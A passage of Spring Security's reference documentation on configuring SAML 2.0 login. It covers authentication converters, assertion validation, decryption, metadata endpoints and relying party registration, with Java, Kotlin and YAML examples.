        OpenSamlAuthenticationProvider authenticationProvider = new OpenSamlAuthenticationProvider();
        authenticationProvider.setResponseAuthenticationConverter(responseToken -> {
            Saml2Authentication authentication = OpenSamlAuthenticationProvider
                    .createDefaultResponseAuthenticationConverter() <1>
                    .convert(responseToken);
            Assertion assertion = responseToken.getResponse().getAssertions().get(0);
            String username = assertion.getSubject().getNameID().getValue();
            UserDetails userDetails = this.userDetailsService.loadUserByUsername(username); <2>
            return new MySaml2Authentication(userDetails, authentication); <3>
        });

        http
            .authorizeRequests(authz -> authz
                .anyRequest().authenticated()
            )
            .saml2Login(saml2 -> saml2
                .authenticationManager(new ProviderManager(authenticationProvider))
            );
    }
}
----
<1> First, call the default converter, which extracts attributes and authorities from the response
<2> Second, call the <<servlet-authentication-userdetailsservice, `UserDetailsService`>> using the relevant information
<3> Third, return a custom authentication that includes the user details

[NOTE]
It's not required to call `OpenSamlAuthenticationProvider` 's default authentication converter.
It returns a `Saml2AuthenticatedPrincipal` containing the attributes it extracted from `AttributeStatement` s as well as the single `ROLE_USER` authority.
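
Note that `MySaml2Authentication` in the snippet is your own class, not one that ships with Spring Security.
A minimal sketch, assuming all it needs to do is swap in the `UserDetails` as the principal while keeping the SAML response and the loaded authorities:

[source,java]
----
public class MySaml2Authentication extends AbstractAuthenticationToken {
    private final UserDetails principal;
    private final Saml2Authentication saml2;

    public MySaml2Authentication(UserDetails principal, Saml2Authentication saml2) {
        // carry the authorities loaded by the UserDetailsService
        super(principal.getAuthorities());
        this.principal = principal;
        this.saml2 = saml2;
        setAuthenticated(true);
    }

    @Override
    public Object getPrincipal() {
        return this.principal;
    }

    @Override
    public Object getCredentials() {
        // keep the raw SAML response available, mirroring Saml2Authentication
        return this.saml2.getSaml2Response();
    }
}
----
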
[[servlet-saml2login-opensamlauthenticationprovider-additionalvalidation]]
==== Performing Additional Validation

`OpenSamlAuthenticationProvider` performs minimal validation on SAML 2.0 Assertions.
After verifying the signature, it will:

1. Validate `<AudienceRestriction>` and `<DelegationRestriction>` conditions
2. Validate `<SubjectConfirmation>` s, except for any IP address information

To perform additional validation, you can configure your own assertion validator that delegates to `OpenSamlAuthenticationProvider` 's default and then performs its own.

[[servlet-saml2login-opensamlauthenticationprovider-onetimeuse]]
For example, you can use OpenSAML's `OneTimeUseConditionValidator` to also validate a `<OneTimeUse>` condition, like so:

[source,java]
----
OpenSamlAuthenticationProvider provider = new OpenSamlAuthenticationProvider();
OneTimeUseConditionValidator validator = ...;
provider.setAssertionValidator(assertionToken -> {
    Saml2ResponseValidatorResult result = OpenSamlAuthenticationProvider
            .createDefaultAssertionValidator()
            .convert(assertionToken);
    Assertion assertion = assertionToken.getAssertion();
    OneTimeUse oneTimeUse = assertion.getConditions().getOneTimeUse();
    ValidationContext context = new ValidationContext();
    try {
        if (validator.validate(oneTimeUse, assertion, context) == ValidationResult.VALID) {
            return result;
        }
    } catch (Exception e) {
        return result.concat(new Saml2Error(INVALID_ASSERTION, e.getMessage()));
    }
    return result.concat(new Saml2Error(INVALID_ASSERTION, context.getValidationFailureMessage()));
});
----

[NOTE]
While recommended, it's not necessary to call `OpenSamlAuthenticationProvider` 's default assertion validator.
A circumstance where you would skip it would be if you don't need it to check the `<AudienceRestriction>` or the `<SubjectConfirmation>` since you are doing those yourself.

[[servlet-saml2login-opensamlauthenticationprovider-decryption]]
==== Customizing Decryption

Spring Security decrypts `<saml2:EncryptedAssertion>`, `<saml2:EncryptedAttribute>`, and `<saml2:EncryptedID>` elements automatically by using the decryption <<servlet-saml2login-rpr-credentials,`Saml2X509Credential` instances>> registered in the <<servlet-saml2login-relyingpartyregistration,`RelyingPartyRegistration`>>.

`OpenSamlAuthenticationProvider` exposes <<servlet-saml2login-architecture,two decryption strategies>>.
The response decrypter is for decrypting encrypted elements of the `<saml2:Response>`, like `<saml2:EncryptedAssertion>`.
The assertion decrypter is for decrypting encrypted elements of the `<saml2:Assertion>`, like `<saml2:EncryptedAttribute>` and `<saml2:EncryptedID>`.

You can replace `OpenSamlAuthenticationProvider`'s default decryption strategy with your own.
For example, if you have a separate service that decrypts the assertions in a `<saml2:Response>`, you can use it instead like so:

[source,java]
----
MyDecryptionService decryptionService = ...;
OpenSamlAuthenticationProvider provider = new OpenSamlAuthenticationProvider();
provider.setResponseElementsDecrypter((responseToken) -> decryptionService.decrypt(responseToken.getResponse()));
----

If you are also decrypting individual elements in a `<saml2:Assertion>`, you can customize the assertion decrypter, too:

[source,java]
----
provider.setAssertionElementsDecrypter((assertionToken) -> decryptionService.decrypt(assertionToken.getAssertion()));
----

NOTE: There are two separate decrypters since assertions can be signed separately from responses.
Trying to decrypt a signed assertion's elements before signature verification may invalidate the signature.
If your asserting party signs the response only, then it's safe to decrypt all elements using only the response decrypter.

[[servlet-saml2login-authenticationmanager-custom]]
==== Using a Custom Authentication Manager

[[servlet-saml2login-opensamlauthenticationprovider-authenticationmanager]]
Of course, the `authenticationManager` DSL method can be also used to perform a completely custom SAML 2.0 authentication.
This authentication manager should expect a `Saml2AuthenticationToken` object containing the SAML 2.0 Response XML data.

[source,java]
----
@EnableWebSecurity
public class SecurityConfig extends WebSecurityConfigurerAdapter {

    @Override
    protected void configure(HttpSecurity http) throws Exception {
        AuthenticationManager authenticationManager = new MySaml2AuthenticationManager(...);
        http
            .authorizeRequests(authorize -> authorize
                .anyRequest().authenticated()
            )
            .saml2Login(saml2 -> saml2
                .authenticationManager(authenticationManager)
            );
    }
}
----

[[servlet-saml2login-authenticatedprincipal]]
=== Using `Saml2AuthenticatedPrincipal`

With the relying party correctly configured for a given asserting party, it's ready to accept assertions.
Once the relying party validates an assertion, the result is a `Saml2Authentication` with a `Saml2AuthenticatedPrincipal`.

This means that you can access the principal in your controller like so:

[source,java]
----
@Controller
public class MainController {
    @GetMapping("/")
    public String index(@AuthenticationPrincipal Saml2AuthenticatedPrincipal principal, Model model) {
        String email = principal.getFirstAttribute("email");
        model.addAttribute("email", email);
        return "index";
    }
}
----

[TIP]
Because the SAML 2.0 specification allows for each attribute to have multiple values, you can either call `getAttribute` to get the list of attributes or `getFirstAttribute` to get the first in the list.
`getFirstAttribute` is quite handy when you know that there is only one value.
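
For example, a short sketch of the difference, assuming the asserting party issues an `email` attribute:

[source,java]
----
List<Object> emails = principal.getAttribute("email"); // every value of the attribute
String email = principal.getFirstAttribute("email");   // just the first value
----
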
[[servlet-saml2login-metadata]]
=== Producing `<saml2:SPSSODescriptor>` Metadata

You can publish a metadata endpoint by adding the `Saml2MetadataFilter` to the filter chain, as you'll see below:

[source,java]
----
Converter<HttpServletRequest, RelyingPartyRegistration> relyingPartyRegistrationResolver =
        new DefaultRelyingPartyRegistrationResolver(this.relyingPartyRegistrationRepository);
Saml2MetadataFilter filter = new Saml2MetadataFilter(
        relyingPartyRegistrationResolver,
        new OpenSamlMetadataResolver());

http
    // ...
    .saml2Login(withDefaults())
    .addFilterBefore(filter, Saml2WebSsoAuthenticationFilter.class);
----

You can use this metadata endpoint to register your relying party with your asserting party.
This is often as simple as finding the correct form field to supply the metadata endpoint.

By default, the metadata endpoint is `+/saml2/service-provider-metadata/{registrationId}+`.
You can change this by calling the `setRequestMatcher` method on the filter:

[source,java]
----
filter.setRequestMatcher(new AntPathRequestMatcher("/saml2/metadata/{registrationId}", "GET"));
----

ensuring that the `registrationId` hint is at the end of the path.

Or, if you have registered a custom relying party registration resolver in the constructor, then you can specify a path without a `registrationId` hint, like so:

[source,java]
----
filter.setRequestMatcher(new AntPathRequestMatcher("/saml2/metadata", "GET"));
----

[[servlet-saml2login-logout]]
=== Performing Single Logout

Spring Security does not yet support single logout.

Generally speaking, though, you can achieve this by creating and registering a custom `LogoutSuccessHandler` and `RequestMatcher`:

[source,java]
----
http
    // ...
    .logout(logout -> logout
        .logoutSuccessHandler(myCustomSuccessHandler())
        .logoutRequestMatcher(myRequestMatcher())
    );
----

The success handler will send logout requests to the asserting party.

The request matcher will detect logout requests from the asserting party.
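
A minimal sketch of those two pieces, assuming a hypothetical asserting party logout endpoint of `https://ap.example.org/logout` and a hypothetical local endpoint `/logout/saml2` for requests coming back from it:

[source,java]
----
private LogoutSuccessHandler myCustomSuccessHandler() {
    // after local logout, send the browser on to the asserting party's logout endpoint
    SimpleUrlLogoutSuccessHandler successHandler = new SimpleUrlLogoutSuccessHandler();
    successHandler.setDefaultTargetUrl("https://ap.example.org/logout");
    return successHandler;
}

private RequestMatcher myRequestMatcher() {
    // treat requests to this endpoint as logout requests from the asserting party
    return new AntPathRequestMatcher("/logout/saml2");
}
----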
`Saml2WebSsoAuthenticationRequestFilter` creates, signs, serializes, and encodes a `<saml2:AuthnRequest>` using its configured <<servlet-saml2login-sp-initiated-factory,`Saml2AuthenticationRequestFactory`>>.\n\nimage:{icondir}\/number_5.png[] Then, the browser takes this `<saml2:AuthnRequest>` and presents it to the asserting party.\nThe asserting party attempts to authentication the user.\nIf successful, it will return a `<saml2:Response>` back to the browser.\n\nimage:{icondir}\/number_6.png[] The browser then POSTs the `<saml2:Response>` to the assertion consumer service endpoint.\n\n[[servlet-saml2login-authentication-saml2webssoauthenticationfilter]]\n.Authenticating a `<saml2:Response>`\nimage::{figures}\/saml2webssoauthenticationfilter.png[]\n\nThe figure builds off our <<servlet-securityfilterchain,`SecurityFilterChain`>> diagram.\n\nimage:{icondir}\/number_1.png[] When the browser submits a `<saml2:Response>` to the application, it <<servlet-saml2login-authenticate-responses, delegates to `Saml2WebSsoAuthenticationFilter`>>.\nThis filter calls its configured `AuthenticationConverter` to create a `Saml2AuthenticationToken` by extracting the response from the `HttpServletRequest`.\nThis converter additionally resolves the <<servlet-saml2login-relyingpartyregistration, `RelyingPartyRegistration`>> and supplies it to `Saml2AuthenticationToken`.\n\nimage:{icondir}\/number_2.png[] Next, the filter passes the token to its configured <<servlet-authentication-providermanager,`AuthenticationManager`>>.\nBy default, it will use the <<servlet-saml2login-architecture,`OpenSamlAuthenticationProvider`>>.\n\nimage:{icondir}\/number_3.png[] If authentication fails, then __Failure__\n\n* The <<servlet-authentication-securitycontextholder, `SecurityContextHolder`>> is cleared out.\n* The <<servlet-authentication-authenticationentrypoint,`AuthenticationEntryPoint`>> is invoked to restart the authentication process.\n\nimage:{icondir}\/number_4.png[] If authentication is successful, then __Success__.\n\n* The <<servlet-authentication-authentication, `Authentication`>> is set on the <<servlet-authentication-securitycontextholder, `SecurityContextHolder`>>.\n* The `Saml2WebSsoAuthenticationFilter` invokes `FilterChain#doFilter(request,response)` to continue with the rest of the application logic.\n\n[[servlet-saml2login-minimaldependencies]]\n=== Minimal Dependencies\n\nSAML 2.0 service provider support resides in `spring-security-saml2-service-provider`.\nIt builds off of the OpenSAML library.\n\n[[servlet-saml2login-minimalconfiguration]]\n=== Minimal Configuration\n\nWhen using https:\/\/spring.io\/projects\/spring-boot[Spring Boot], configuring an application as a service provider consists of two basic steps.\nFirst, include the needed dependencies and second, indicate the necessary asserting party metadata.\n\n[NOTE]\nAlso, this presupposes that you've already <<servlet-saml2login-metadata, registered the relying party with your asserting party>>.\n\n==== Specifying Identity Provider Metadata\n\nIn a Spring Boot application, to specify an identity provider's metadata, simply do:\n\n[source,yml]\n----\nspring:\n security:\n saml2:\n relyingparty:\n registration:\n adfs:\n identityprovider:\n entity-id: https:\/\/idp.example.com\/issuer\n verification.credentials:\n - certificate-location: \"classpath:idp.crt\"\n singlesignon.url: https:\/\/idp.example.com\/issuer\/sso\n singlesignon.sign-request: false\n----\n\nwhere\n\n* `https:\/\/idp.example.com\/issuer` is the value contained in the `Issuer` 
attribute of the SAML responses that the identity provider will issue\n* `classpath:idp.crt` is the location on the classpath for the identity provider's certificate for verifying SAML responses, and\n* `https:\/\/idp.example.com\/issuer\/sso` is the endpoint where the identity provider is expecting `AuthnRequest` s.\n\nAnd that's it!\n\n[NOTE]\nIdentity Provider and Asserting Party are synonymous, as are Service Provider and Relying Party.\nThese are frequently abbreviated as AP and RP, respectively.\n\n==== Runtime Expectations\n\nAs configured above, the application processes any `+POST \/login\/saml2\/sso\/{registrationId}+` request containing a `SAMLResponse` parameter:\n\n[source,html]\n----\nPOST \/login\/saml2\/sso\/adfs HTTP\/1.1\n\nSAMLResponse=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZ...\n----\n\nThere are two ways to see induce your asserting party to generate a `SAMLResponse`:\n\n* First, you can navigate to your asserting party.\nIt likely has some kind of link or button for each registered relying party that you can click to send the `SAMLResponse`.\n* Second, you can navigate to a protected page in your app, for example, `http:\/\/localhost:8080`.\nYour app then redirects to the configured asserting party which then sends the `SAMLResponse`.\n\nFrom here, consider jumping to:\n\n* <<servlet-saml2login-architecture,How SAML 2.0 Login Integrates with OpenSAML>>\n* <<servlet-saml2login-authenticatedprincipal,How to Use the `Saml2AuthenticatedPrincipal`>>\n* <<servlet-saml2login-sansboot,How to Override or Replace Spring Boot's Auto Configuration>>\n\n[[servlet-saml2login-architecture]]\n=== How SAML 2.0 Login Integrates with OpenSAML\n\nSpring Security's SAML 2.0 support has a couple of design goals:\n\n* First, rely on a library for SAML 2.0 operations and domain objects.\nTo achieve this, Spring Security uses OpenSAML.\n* Second, ensure this library is not required when using Spring Security's SAML support.\nTo achieve this, any interfaces or classes where Spring Security uses OpenSAML in the contract remain encapsulated.\nThis makes it possible for you to switch out OpenSAML for some other library or even an unsupported version of OpenSAML.\n\nAs a natural outcome of the above two goals, Spring Security's SAML API is quite small relative to other modules.\nInstead, classes like `OpenSamlAuthenticationRequestFactory` and `OpenSamlAuthenticationProvider` expose `Converter` s that customize various steps in the authentication process.\n\nFor example, once your application receives a `SAMLResponse` and delegates to `Saml2WebSsoAuthenticationFilter`, the filter will delegate to `OpenSamlAuthenticationProvider`.\n\n.Authenticating an OpenSAML `Response`\nimage:{figures}\/opensamlauthenticationprovider.png[]\n\nThis figure builds off of the <<servlet-saml2login-authentication-saml2webssoauthenticationfilter,`Saml2WebSsoAuthenticationFilter` diagram>>.\n\nimage:{icondir}\/number_1.png[] The `Saml2WebSsoAuthenticationFilter` formulates the `Saml2AuthenticationToken` and invokes the <<servlet-authentication-providermanager,`AuthenticationManager`>>.\n\nimage:{icondir}\/number_2.png[] The <<servlet-authentication-providermanager,`AuthenticationManager`>> invokes the `OpenSamlAuthenticationProvider`.\n\nimage:{icondir}\/number_3.png[] The authentication provider deserializes the response into an OpenSAML `Response` and checks its signature.\nIf the signature is invalid, authentication fails.\n\nimage:{icondir}\/number_4.png[] Then, the provider 
<<servlet-saml2login-opensamlauthenticationprovider-decryption,decrypts any `EncryptedAssertion` elements>>.\nIf any decryptions fail, authentication fails.\n\nimage:{icondir}\/number_5.png[] Next, the provider validates the response's `Issuer` and `Destination` values.\nIf they don't match what's in the `RelyingPartyRegistration`, authentication fails.\n\nimage:{icondir}\/number_6.png[] After that, the provider verifies the signature of each `Assertion`.\nIf any signature is invalid, authentication fails.\nAlso, if neither the response nor the assertions have signatures, authentication fails.\nEither the response or all the assertions must have signatures.\n\nimage:{icondir}\/number_7.png[] Then, the provider <<servlet-saml2login-opensamlauthenticationprovider-decryption,decrypts any `EncryptedID` or `EncryptedAttribute` elements>>.\nIf any decryptions fail, authentication fails.\n\nimage:{icondir}\/number_8.png[] Next, the provider validates each assertion's `ExpiresAt` and `NotBefore` timestamps, the `<Subject>` and any `<AudienceRestriction>` conditions.\nIf any validations fail, authentication fails.\n\nimage:{icondir}\/number_9.png[] Following that, the provider takes the first assertion's `AttributeStatement` and maps it to a `Map<String, List<Object>>`.\nIt also grants the `ROLE_USER` granted authority.\n\nimage:{icondir}\/number_10.png[] And finally, it takes the `NameID` from the first assertion, the `Map` of attributes, and the `GrantedAuthority` and constructs a `Saml2AuthenticatedPrincipal`.\nThen, it places that principal and the authorities into a `Saml2Authentication`.\n\nThe resulting `Authentication#getPrincipal` is a Spring Security `Saml2AuthenticatedPrincipal` object, and `Authentication#getName` maps to the first assertion's `NameID` element.\n\n[[servlet-saml2login-opensaml-customization]]\n==== Customizing OpenSAML Configuration\n\nAny class that uses both Spring Security and OpenSAML should statically initialize `OpenSamlInitializationService` at the beginning of the class, like so:\n\n[source,java]\n----\nstatic {\n\tOpenSamlInitializationService.initialize();\n}\n----\n\nThis replaces OpenSAML's `InitializationService#initialize`.\n\nOccasionally, it can be valuable to customize how OpenSAML builds, marshalls, and unmarshalls SAML objects.\nIn these circumstances, you may instead want to call `OpenSamlInitializationService#requireInitialize(Consumer)` that gives you access to OpenSAML's `XMLObjectProviderFactory`.\n\nFor example, when sending an unsigned AuthNRequest, you may want to force reauthentication.\nIn that case, you can register your own `AuthnRequestMarshaller`, like so:\n\n[source,java]\n----\nstatic {\n\tOpenSamlInitializationService.requireInitialize(factory -> {\n\t\tAuthnRequestMarshaller marshaller = new AuthnRequestMarshaller() {\n\t\t\t@Override\n public Element marshall(XMLObject object, Element element) throws MarshallingException {\n\t\t\t\tconfigureAuthnRequest((AuthnRequest) object);\n\t\t\t\treturn super.marshall(object, element);\n }\n\n public Element marshall(XMLObject object, Document document) throws MarshallingException {\n\t\t\t\tconfigureAuthnRequest((AuthnRequest) object);\n\t\t\t\treturn super.marshall(object, document);\n }\n\n private void configureAuthnRequest(AuthnRequest authnRequest) {\n\t\t\t\tauthnRequest.setForceAuthN(true);\n }\n\t\t}\n\n\t factory.getMarshallerFactory().registerMarshaller(AuthnRequest.DEFAULT_ELEMENT_NAME, marshaller);\n\t});\n}\n----\n\nThe `requireInitialize` method may only be called once per 
application instance.\n\n[[servlet-saml2login-sansboot]]\n=== Overriding or Replacing Boot Auto Configuration\n\nThere are two `@Bean` s that Spring Boot generates for a relying party.\n\nThe first is a `WebSecurityConfigurerAdapter` that configures the app as a relying party.\nWhen including `spring-security-saml2-service-provider`, the `WebSecurityConfigurerAdapter` looks like:\n\n.Default JWT Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\nprotected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .saml2Login(withDefaults());\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nfun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(anyRequest, authenticated)\n }\n saml2Login { }\n }\n}\n----\n====\n\nIf the application doesn't expose a `WebSecurityConfigurerAdapter` bean, then Spring Boot will expose the above default one.\n\nYou can replace this by exposing the bean within the application:\n\n.Custom SAML 2.0 Login Configuration\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"ROLE_USER\")\n .anyRequest().authenticated()\n )\n .saml2Login(withDefaults());\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass MyCustomSecurityConfiguration : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/messages\/**\", hasAuthority(\"ROLE_USER\"))\n authorize(anyRequest, authenticated)\n }\n saml2Login {\n }\n }\n }\n}\n----\n====\n\nThe above requires the role of `USER` for any URL that starts with `\/messages\/`.\n\n[[servlet-saml2login-relyingpartyregistrationrepository]]\nThe second `@Bean` Spring Boot creates is a {security-api-url}org\/springframework\/security\/saml2\/provider\/service\/registration\/RelyingPartyRegistrationRepository.html[`RelyingPartyRegistrationRepository`], which represents the asserting party and relying party metadata.\nThis includes things like the location of the SSO endpoint the relying party should use when requesting authentication from the asserting party.\n\nYou can override the default by publishing your own `RelyingPartyRegistrationRepository` bean.\nFor example, you can look up the asserting party's configuration by hitting its metadata endpoint like so:\n\n.Relying Party Registration Repository\n====\n[source,java]\n----\n@Value(\"${metadata.location}\")\nString assertingPartyMetadataLocation;\n\n@Bean\npublic RelyingPartyRegistrationRepository relyingPartyRegistrations() {\n\tRelyingPartyRegistration registration = RelyingPartyRegistrations\n .fromMetadataLocation(assertingPartyMetadataLocation)\n .registrationId(\"example\")\n .build();\n return new InMemoryRelyingPartyRegistrationRepository(registration);\n}\n----\n====\n\nOr you can provide each detail manually, as you can see below:\n\n.Relying Party Registration Repository Manual Configuration\n====\n[source,java]\n----\n@Value(\"${verification.key}\")\nFile verificationKey;\n\n@Bean\npublic RelyingPartyRegistrationRepository relyingPartyRegistrations() throws Exception {\n X509Certificate certificate = X509Support.decodeCertificate(this.verificationKey);\n Saml2X509Credential credential = 
Saml2X509Credential.verification(certificate);\n RelyingPartyRegistration registration = RelyingPartyRegistration\n .withRegistrationId(\"example\")\n .assertingPartyDetails(party -> party\n .entityId(\"https:\/\/idp.example.com\/issuer\")\n .singleSignOnServiceLocation(\"https:\/\/idp.example.com\/SSO.saml2\")\n .wantAuthnRequestsSigned(false)\n .verificationX509Credentials(c -> c.add(credential))\n )\n .build();\n return new InMemoryRelyingPartyRegistrationRepository(registration);\n}\n----\n====\n\n[NOTE]\nNote that `X509Support` is an OpenSAML class, used here in the snippet for brevity\n\n[[servlet-saml2login-relyingpartyregistrationrepository-dsl]]\n\nAlternatively, you can directly wire up the repository using the DSL, which will also override the auto-configured `WebSecurityConfigurerAdapter`:\n\n.Custom Relying Party Registration DSL\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorize -> authorize\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"ROLE_USER\")\n .anyRequest().authenticated()\n )\n .saml2Login(saml2 -> saml2\n .relyingPartyRegistrationRepository(relyingPartyRegistrations())\n );\n }\n}\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@EnableWebSecurity\nclass MyCustomSecurityConfiguration : WebSecurityConfigurerAdapter() {\n override fun configure(http: HttpSecurity) {\n http {\n authorizeRequests {\n authorize(\"\/messages\/**\", hasAuthority(\"ROLE_USER\"))\n authorize(anyRequest, authenticated)\n }\n saml2Login {\n relyingPartyRegistrationRepository = relyingPartyRegistrations()\n }\n }\n }\n}\n----\n====\n\n[NOTE]\nA relying party can be multi-tenant by registering more than one relying party in the `RelyingPartyRegistrationRepository`.\n\n[[servlet-saml2login-relyingpartyregistration]]\n=== RelyingPartyRegistration\nA {security-api-url}org\/springframework\/security\/saml2\/provider\/service\/registration\/RelyingPartyRegistration.html[`RelyingPartyRegistration`]\ninstance represents a link between an relying party and assering party's metadata.\n\nIn a `RelyingPartyRegistration`, you can provide relying party metadata like its `Issuer` value, where it expects SAML Responses to be sent to, and any credentials that it owns for the purposes of signing or decrypting payloads.\n\nAlso, you can provide asserting party metadata like its `Issuer` value, where it expects AuthnRequests to be sent to, and any public credentials that it owns for the purposes of the relying party verifying or encrypting payloads.\n\nThe following `RelyingPartyRegistration` is the minimum required for most setups:\n\n[source,java]\n----\nRelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistrations\n .fromMetadataLocation(\"https:\/\/ap.example.org\/metadata\")\n .registrationId(\"my-id\")\n .build();\n----\n\nThough a more sophisticated setup is also possible, like so:\n\n[source,java]\n----\nRelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistration.withRegistrationId(\"my-id\")\n .entityId(\"{baseUrl}\/{registrationId}\")\n .decryptionX509Credentials(c -> c.add(relyingPartyDecryptingCredential()))\n .assertionConsumerServiceLocation(\"\/my-login-endpoint\/{registrationId}\")\n .assertingParty(party -> party\n .entityId(\"https:\/\/ap.example.org\")\n .verificationX509Credentials(c -> c.add(assertingPartyVerifyingCredential()))\n 
.singleSignOnServiceLocation(\"https:\/\/ap.example.org\/SSO.saml2\")\n );\n----\n\n[TIP]\nThe top-level metadata methods are details about the relying party.\nThe methods inside `assertingPartyDetails` are details about the asserting party.\n\n[NOTE]\nThe location where a relying party is expecting SAML Responses is the Assertion Consumer Service Location.\n\nThe default for the relying party's `entityId` is `+{baseUrl}\/saml2\/service-provider-metadata\/{registrationId}+`.\nThis is this value needed when configuring the asserting party to know about your relying party.\n\nThe default for the `assertionConsumerServiceLocation` is `+\/login\/saml2\/sso\/{registrationId}+`.\nIt's mapped by default to <<servlet-saml2login-authentication-saml2webssoauthenticationfilter,`Saml2WebSsoAuthenticationFilter`>> in the filter chain.\n\n[[servlet-saml2login-rpr-uripatterns]]\n==== URI Patterns\n\nYou probably noticed in the above examples the `+{baseUrl}+` and `+{registrationId}+` placeholders.\n\nThese are useful for generating URIs. As such, the relying party's `entityId` and `assertionConsumerServiceLocation` support the following placeholders:\n\n* `baseUrl` - the scheme, host, and port of a deployed application\n* `registrationId` - the registration id for this relying party\n* `baseScheme` - the scheme of a deployed application\n* `baseHost` - the host of a deployed application\n* `basePort` - the port of a deployed application\n\nFor example, the `assertionConsumerServiceLocation` defined above was:\n\n`+\/my-login-endpoint\/{registrationId}+`\n\nwhich in a deployed application would translate to\n\n`+\/my-login-endpoint\/adfs+`\n\nThe `entityId` above was defined as:\n\n`+{baseUrl}\/{registrationId}+`\n\nwhich in a deployed application would translate to\n\n`+https:\/\/rp.example.com\/adfs+`\n\n[[servlet-saml2login-rpr-credentials]]\n==== Credentials\n\nYou also likely noticed the credential that was used.\n\nOftentimes, a relying party will use the same key to sign payloads as well as decrypt them.\nOr it will use the same key to verify payloads as well as encrypt them.\n\nBecause of this, Spring Security ships with `Saml2X509Credential`, a SAML-specific credential that simplifies configuring the same key for different use cases.\n\nAt a minimum, it's necessary to have a certificate from the asserting party so that the asserting party's signed responses can be verified.\n\nTo construct a `Saml2X509Credential` that you'll use to verify assertions from the asserting party, you can load the file and use\nthe `CertificateFactory` like so:\n\n[source,java]\n----\nResource resource = new ClassPathResource(\"ap.crt\");\ntry (InputStream is = resource.getInputStream()) {\n\tX509Certificate certificate = (X509Certificate)\n CertificateFactory.getInstance(\"X.509\").generateCertificate(is);\n\treturn Saml2X509Credential.verification(certificate);\n}\n----\n\nLet's say that the asserting party is going to also encrypt the assertion.\nIn that case, the relying party will need a private key to be able to decrypt the encrypted value.\n\nIn that case, you'll need an `RSAPrivateKey` as well as its corresponding `X509Certificate`.\nYou can load the first using Spring Security's `RsaKeyConverters` utility class and the second as you did before:\n\n[source,java]\n----\nX509Certificate certificate = relyingPartyDecryptionCertificate();\nResource resource = new ClassPathResource(\"rp.crt\");\ntry (InputStream is = resource.getInputStream()) {\n\tRSAPrivateKey rsa = RsaKeyConverters.pkcs8().convert(is);\n\treturn 
\n[[servlet-saml2login-rpr-relyingpartyregistrationresolver]]\n==== Resolving the Relying Party from the Request\n\nAs seen so far, Spring Security resolves the `RelyingPartyRegistration` by looking for the registration id in the URI path.\n\nThere are a number of reasons you may want to customize this. Among them:\n\n* You may know that you will never be a multi-tenant application and so want to have a simpler URL scheme\n* You may identify tenants in a way other than by the URI path\n\nTo customize the way that a `RelyingPartyRegistration` is resolved, you can configure a custom `Converter<HttpServletRequest, RelyingPartyRegistration>`.\nThe default takes the registration id from the URI's last path element and looks it up in your `RelyingPartyRegistrationRepository`.\n\nYou can provide a simpler resolver that, for example, always returns the same relying party:\n\n[source,java]\n----\npublic class SingleRelyingPartyRegistrationResolver\n implements Converter<HttpServletRequest, RelyingPartyRegistration> {\n\n\tprivate final RelyingPartyRegistration relyingParty;\n\n\tpublic SingleRelyingPartyRegistrationResolver(RelyingPartyRegistration relyingParty) {\n\t\tthis.relyingParty = relyingParty;\n }\n\n\t@Override\n public RelyingPartyRegistration convert(HttpServletRequest request) {\n\t\treturn this.relyingParty;\n }\n}\n----\n\nThen, you can provide this resolver to the appropriate filters that <<servlet-saml2login-sp-initiated-factory, produce `<saml2:AuthnRequest>` s>>, <<servlet-saml2login-authenticate-responses, authenticate `<saml2:Response>` s>>, and <<servlet-saml2login-metadata, produce `<saml2:SPSSODescriptor>` metadata>>.\n\n[NOTE]\nRemember that if you have any placeholders in your `RelyingPartyRegistration`, your resolver implementation should resolve them.\n\n[[servlet-saml2login-rpr-duplicated]]\n==== Duplicated Relying Party Configurations\n\nWhen an application uses multiple asserting parties, some configuration is duplicated between `RelyingPartyRegistration` instances:\n\n* The relying party's `entityId`\n* Its `assertionConsumerServiceLocation`, and\n* Its credentials, for example its signing or decryption credentials\n\nWhat's nice about this setup is that credentials may be more easily rotated for some identity providers vs others.\n\nThe duplication can be alleviated in a few different ways.\n\nFirst, in YAML this can be alleviated with references, like so:\n\n[source,yaml]\n----\nspring:\n security:\n saml2:\n relyingparty:\n okta:\n signing.credentials: &relying-party-credentials\n - private-key-location: classpath:rp.key\n certificate-location: classpath:rp.crt\n identityprovider:\n entity-id: ...\n azure:\n signing.credentials: *relying-party-credentials\n identityprovider:\n entity-id: ...\n----\n\nSecond, in a database, it's not necessary to replicate `RelyingPartyRegistration` 's model; the shared values can be stored once and applied to each registration as it is loaded.\n\nThird, in Java, you can create a custom configuration method, like so:\n\n[source,java]\n----\nprivate RelyingPartyRegistration.Builder\n addRelyingPartyDetails(RelyingPartyRegistration.Builder builder) {\n\n\tSaml2X509Credential signingCredential = ...\n\tbuilder.signingX509Credentials(c -> c.add(signingCredential));\n\t\/\/ ... other relying party configurations\n\treturn builder;\n}\n
